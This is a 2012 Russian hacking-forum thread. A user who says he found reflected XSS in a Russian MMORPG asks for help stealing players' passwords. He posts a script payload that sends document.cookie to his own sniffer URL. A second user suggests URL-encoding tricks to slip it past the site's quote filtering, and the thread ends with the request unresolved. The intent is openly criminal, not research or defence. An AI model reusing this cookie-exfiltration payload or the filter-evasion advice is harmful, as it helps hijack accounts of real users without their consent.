Пасивная XSS, нужна помощь!
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Пасивная XSS, нужна помощь! - 2012-01-28 21:24:21.320000
|
|
|
Rifes
Сообщений: 9
Оценки: 0
Присоединился: 2012-01-28 21:14:54.053333
|
Всем доброго времени суток, у меня возникла тут одна проблема…
Нашел XSS в одной русской ММОРПГ, хотелось бы утащить пароли…
но вот проблема запрос - <script>alert(/Rifes XSS/)</script> - проходит успешно…
в то время как:
<sсriрt>img = new Image(); img.src = "http://мой-сайт.уг/snif/s.gif?c="+document.cookie;</sсriрt>
Фильтрует на:
<sсriрt>img = new Image(); img.src =\"http://мой-сайт.уг/snif/s.gif?c=\" document.cookie;</sсriрt>
поможет ли кто составить правильный запрос?
если кому интересно искал сканером на уязвимости JSky, по лучше WebCruiser будет!
|
|
|
|
|
RE: Пасивная XSS, нужна помощь! - 2012-01-30 07:02:43.280000
|
|
|
den_hacker
Сообщений: 9
Оценки: 0
Присоединился: 2012-01-30 06:15:18.350000
|
Может фильтр на "" или http://
Попробуй вместо
"http://мой-сайт.уг/snif/s.gif?c="
Вставить
%22http%3A%2F%2F%EC%EE%E9%2D%F1%E0%E9%F2%2E%F3%E3%2Fsnif%2Fs%2Egif%3Fc%3D%22
и + заменить на %2B
Может и сожрёт фильтр
|
|
|
|
|
RE: Пасивная XSS, нужна помощь! - 2012-01-30 19:00:22.880000
|
|
|
Rifes
Сообщений: 9
Оценки: 0
Присоединился: 2012-01-28 21:14:54.053333
|
Увы не помогло, все-таки фильтрует
|
|
|
|
|
RE: Пасивная XSS, нужна помощь! - 2012-02-09 18:48:01.300000
|
|
|
Rifes
Сообщений: 9
Оценки: 0
Присоединился: 2012-01-28 21:14:54.053333
|
Ну что есть идеи?
|
|
|
|
|
|
